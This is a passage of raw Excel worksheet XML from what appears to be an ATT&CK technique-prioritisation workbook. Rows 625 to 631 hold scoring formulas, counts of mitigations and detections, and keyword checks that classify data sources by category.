        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ625" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>86.777777777777771</v>
      </c>
      <c r="AR625" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS625" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT625" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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26" spans="1:47" ht="68">
      <c r="A626" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B626" s="37">
        <f t="shared" si="9"/>
        <v>296.30952380952385</v>
      </c>
      <c r="C626" s="37" t="s">
        <v>2020</v>
      </c>
      <c r="D626" s="50" t="s">
        <v>2021</v>
      </c>
      <c r="E626" s="37"/>
      <c r="F626" s="37">
        <v>1</v>
      </c>
      <c r="G626" s="37">
        <v>1</v>
      </c>
      <c r="H626" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I626" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J626" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K626" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L626" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M626" s="37">
        <v>0</v>
      </c>
      <c r="N626" s="56">
        <v>0</v>
      </c>
      <c r="O626" s="56">
        <v>4</v>
      </c>
      <c r="P626" s="56">
        <v>0</v>
      </c>
      <c r="Q626" s="56">
        <v>0</v>
      </c>
      <c r="R626" s="57"/>
      <c r="S626" s="57">
        <v>0</v>
      </c>
      <c r="T626" s="57"/>
      <c r="U626" s="57">
        <v>0</v>
      </c>
      <c r="V626" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W626" s="37">
        <v>0</v>
      </c>
      <c r="X626" s="37">
        <v>0</v>
      </c>
      <c r="Y626" s="37">
        <v>0</v>
      </c>
      <c r="Z626" s="37">
        <v>4</v>
      </c>
      <c r="AA626" s="37">
        <v>0.04</v>
      </c>
      <c r="AB626" s="37">
        <v>0.04</v>
      </c>
      <c r="AC626" s="37"/>
      <c r="AD626" s="50" t="s">
        <v>2022</v>
      </c>
      <c r="AE626" s="37" t="str" cm="1">
        <f t="array" ref="AE626">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD626)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF626" s="37">
        <v>622</v>
      </c>
      <c r="AG626" s="37" t="str" cm="1">
        <f t="array" ref="AG626">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD626)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH626" s="37">
        <v>622</v>
      </c>
      <c r="AI626" s="37" t="str" cm="1">
        <f t="array" ref="AI626">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD626)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ626" s="37">
        <v>622</v>
      </c>
      <c r="AK626" s="37" t="str" cm="1">
        <f t="array" ref="AK626">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD626)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL626" s="37">
        <v>622</v>
      </c>
      <c r="AM626" s="37" t="str" cm="1">
        <f t="array" ref="AM626">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD626)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN626" s="37">
        <v>0</v>
      </c>
      <c r="AO626" s="37">
        <v>0</v>
      </c>
      <c r="AP626" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ626" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>98.76984126984128</v>
      </c>
      <c r="AR626" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS626" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT626" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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27" spans="1:47" ht="34">
      <c r="A627" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B627" s="37">
        <f t="shared" si="9"/>
        <v>249.3</v>
      </c>
      <c r="C627" s="37" t="s">
        <v>2023</v>
      </c>
      <c r="D627" s="50" t="s">
        <v>2024</v>
      </c>
      <c r="E627" s="37"/>
      <c r="F627" s="37">
        <v>1</v>
      </c>
      <c r="G627" s="37">
        <v>1</v>
      </c>
      <c r="H627" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I627" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J627" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K627" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L627" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M627" s="37">
        <v>0</v>
      </c>
      <c r="N627" s="56">
        <v>0</v>
      </c>
      <c r="O627" s="56">
        <v>0</v>
      </c>
      <c r="P627" s="56">
        <v>0</v>
      </c>
      <c r="Q627" s="56">
        <v>0</v>
      </c>
      <c r="R627" s="57"/>
      <c r="S627" s="57">
        <v>0</v>
      </c>
      <c r="T627" s="57" t="s">
        <v>2025</v>
      </c>
      <c r="U627" s="57">
        <v>0</v>
      </c>
      <c r="V627" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W627" s="37">
        <v>0</v>
      </c>
      <c r="X627" s="37">
        <v>0</v>
      </c>
      <c r="Y627" s="37">
        <v>0</v>
      </c>
      <c r="Z627" s="37">
        <v>0</v>
      </c>
      <c r="AA627" s="37">
        <v>0</v>
      </c>
      <c r="AB627" s="37">
        <v>0</v>
      </c>
      <c r="AC627" s="37"/>
      <c r="AD627" s="50" t="s">
        <v>2026</v>
      </c>
      <c r="AE627" s="37" t="str" cm="1">
        <f t="array" ref="AE627">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD627)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF627" s="37">
        <v>623</v>
      </c>
      <c r="AG627" s="37" t="str" cm="1">
        <f t="array" ref="AG627">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD627)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH627" s="37">
        <v>623</v>
      </c>
      <c r="AI627" s="37" t="str" cm="1">
        <f t="array" ref="AI627">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD627)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ627" s="37">
        <v>623</v>
      </c>
      <c r="AK627" s="37" t="str" cm="1">
        <f t="array" ref="AK627">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD627)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL627" s="37">
        <v>623</v>
      </c>
      <c r="AM627" s="37" t="str" cm="1">
        <f t="array" ref="AM627">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD627)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN627" s="37">
        <v>0</v>
      </c>
      <c r="AO627" s="37">
        <v>0</v>
      </c>
      <c r="AP627" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ627" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>83.100000000000009</v>
      </c>
      <c r="AR627" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS627" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT627" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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28" spans="1:47" ht="34">
      <c r="A628" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B628" s="37">
        <f t="shared" si="9"/>
        <v>261.59047619047618</v>
      </c>
      <c r="C628" s="37" t="s">
        <v>2027</v>
      </c>
      <c r="D628" s="50" t="s">
        <v>2028</v>
      </c>
      <c r="E628" s="37"/>
      <c r="F628" s="37">
        <v>1</v>
      </c>
      <c r="G628" s="37">
        <v>1</v>
      </c>
      <c r="H628" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I628" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J628" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K628" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L628" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M628" s="37">
        <v>0</v>
      </c>
      <c r="N628" s="56">
        <v>0</v>
      </c>
      <c r="O628" s="56">
        <v>1</v>
      </c>
      <c r="P628" s="56">
        <v>0</v>
      </c>
      <c r="Q628" s="56">
        <v>0</v>
      </c>
      <c r="R628" s="57"/>
      <c r="S628" s="57">
        <v>0</v>
      </c>
      <c r="T628" s="57"/>
      <c r="U628" s="57">
        <v>0</v>
      </c>
      <c r="V628" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W628" s="37">
        <v>0</v>
      </c>
      <c r="X628" s="37">
        <v>0</v>
      </c>
      <c r="Y628" s="37">
        <v>0</v>
      </c>
      <c r="Z628" s="37">
        <v>1</v>
      </c>
      <c r="AA628" s="37">
        <v>0.01</v>
      </c>
      <c r="AB628" s="37">
        <v>0.01</v>
      </c>
      <c r="AC628" s="37"/>
      <c r="AD628" s="50" t="s">
        <v>2029</v>
      </c>
      <c r="AE628" s="37" t="str" cm="1">
        <f t="array" ref="AE628">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD628)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF628" s="37">
        <v>624</v>
      </c>
      <c r="AG628" s="37" t="str" cm="1">
        <f t="array" ref="AG628">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD628)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH628" s="37">
        <v>624</v>
      </c>
      <c r="AI628" s="37" t="str" cm="1">
        <f t="array" ref="AI628">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD628)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ628" s="37">
        <v>624</v>
      </c>
      <c r="AK628" s="37" t="str" cm="1">
        <f t="array" ref="AK628">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD628)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL628" s="37">
        <v>624</v>
      </c>
      <c r="AM628" s="37" t="str" cm="1">
        <f t="array" ref="AM628">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD628)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN628" s="37">
        <v>0</v>
      </c>
      <c r="AO628" s="37">
        <v>0</v>
      </c>
      <c r="AP628" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ628" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>87.196825396825389</v>
      </c>
      <c r="AR628" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS628" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT628" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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29" spans="1:47" ht="51">
      <c r="A629" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B629" s="37">
        <f t="shared" si="9"/>
        <v>333.46666666666664</v>
      </c>
      <c r="C629" s="37" t="s">
        <v>2030</v>
      </c>
      <c r="D629" s="50" t="s">
        <v>2031</v>
      </c>
      <c r="E629" s="37"/>
      <c r="F629" s="37">
        <v>1</v>
      </c>
      <c r="G629" s="37">
        <v>1</v>
      </c>
      <c r="H629" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I629" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J629" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K629" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L629" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M629" s="37">
        <v>0</v>
      </c>
      <c r="N629" s="56">
        <v>0</v>
      </c>
      <c r="O629" s="56">
        <v>0</v>
      </c>
      <c r="P629" s="56">
        <v>0</v>
      </c>
      <c r="Q629" s="56">
        <v>7</v>
      </c>
      <c r="R629" s="57"/>
      <c r="S629" s="57">
        <v>0</v>
      </c>
      <c r="T629" s="57"/>
      <c r="U629" s="57">
        <v>0</v>
      </c>
      <c r="V629" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W629" s="37">
        <v>0</v>
      </c>
      <c r="X629" s="37">
        <v>0</v>
      </c>
      <c r="Y629" s="37">
        <v>0</v>
      </c>
      <c r="Z629" s="37">
        <v>7</v>
      </c>
      <c r="AA629" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB629" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC629" s="37"/>
      <c r="AD629" s="50" t="s">
        <v>2032</v>
      </c>
      <c r="AE629" s="37" t="str" cm="1">
        <f t="array" ref="AE629">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD629)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF629" s="37">
        <v>625</v>
      </c>
      <c r="AG629" s="37" t="str" cm="1">
        <f t="array" ref="AG629">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD629)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH629" s="37">
        <v>625</v>
      </c>
      <c r="AI629" s="37" t="str" cm="1">
        <f t="array" ref="AI629">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD629)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ629" s="37">
        <v>625</v>
      </c>
      <c r="AK629" s="37" t="str" cm="1">
        <f t="array" ref="AK629">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD629)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL629" s="37">
        <v>625</v>
      </c>
      <c r="AM629" s="37" t="str" cm="1">
        <f t="array" ref="AM629">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD629)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN629" s="37">
        <v>0</v>
      </c>
      <c r="AO629" s="37"/>
      <c r="AP629" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ629" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>111.15555555555555</v>
      </c>
      <c r="AR629" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS629" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT629" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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30" spans="1:47" ht="51">
      <c r="A630" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B630" s="37">
        <f t="shared" si="9"/>
        <v>250.5</v>
      </c>
      <c r="C630" s="37" t="s">
        <v>2033</v>
      </c>
      <c r="D630" s="50" t="s">
        <v>2034</v>
      </c>
      <c r="E630" s="37"/>
      <c r="F630" s="37">
        <v>1</v>
      </c>
      <c r="G630" s="37">
        <v>1</v>
      </c>
      <c r="H630" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I630" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J630" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K630" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L630" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M630" s="37">
        <v>0</v>
      </c>
      <c r="N630" s="56">
        <v>0</v>
      </c>
      <c r="O630" s="56">
        <v>0</v>
      </c>
      <c r="P630" s="56">
        <v>0</v>
      </c>
      <c r="Q630" s="56">
        <v>0</v>
      </c>
      <c r="R630" s="57"/>
      <c r="S630" s="57">
        <v>0</v>
      </c>
      <c r="T630" s="57"/>
      <c r="U630" s="57">
        <v>0</v>
      </c>
      <c r="V630" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W630" s="37">
        <v>0</v>
      </c>
      <c r="X630" s="37">
        <v>0</v>
      </c>
      <c r="Y630" s="37">
        <v>0</v>
      </c>
      <c r="Z630" s="37">
        <v>0</v>
      </c>
      <c r="AA630" s="37">
        <v>0</v>
      </c>
      <c r="AB630" s="37">
        <v>0</v>
      </c>
      <c r="AC630" s="37"/>
      <c r="AD630" s="50" t="s">
        <v>2035</v>
      </c>
      <c r="AE630" s="37" t="str" cm="1">
        <f t="array" ref="AE630">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD630)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF630" s="37">
        <v>626</v>
      </c>
      <c r="AG630" s="37" t="str" cm="1">
        <f t="array" ref="AG630">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD630)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH630" s="37">
        <v>626</v>
      </c>
      <c r="AI630" s="37" t="str" cm="1">
        <f t="array" ref="AI630">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD630)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ630" s="37">
        <v>626</v>
      </c>
      <c r="AK630" s="37" t="str" cm="1">
        <f t="array" ref="AK630">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD630)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL630" s="37">
        <v>626</v>
      </c>
      <c r="AM630" s="37" t="str" cm="1">
        <f t="array" ref="AM630">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD630)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN630" s="37">
        <v>0</v>
      </c>
      <c r="AO630" s="37">
        <v>0</v>
      </c>
      <c r="AP630" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ630" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>83.5</v>
      </c>
      <c r="AR630" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS630" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT630" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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31" spans="1:47" ht="51">
      <c r="A631" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B631" s="37">
        <f t="shared" si="9"/>
        <v>884.12404847619052</v>
      </c>
      <c r="C631" s="37" t="s">
        <v>2036</v>
      </c>
      <c r="D631" s="50" t="s">
        <v>2037</v>
      </c>
      <c r="E631" s="37" t="s">
        <v>3825</v>
      </c>
      <c r="F631" s="37">
        <v>1</v>
      </c>
      <c r="G631" s="37">
        <v>1</v>
      </c>
      <c r="H631" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
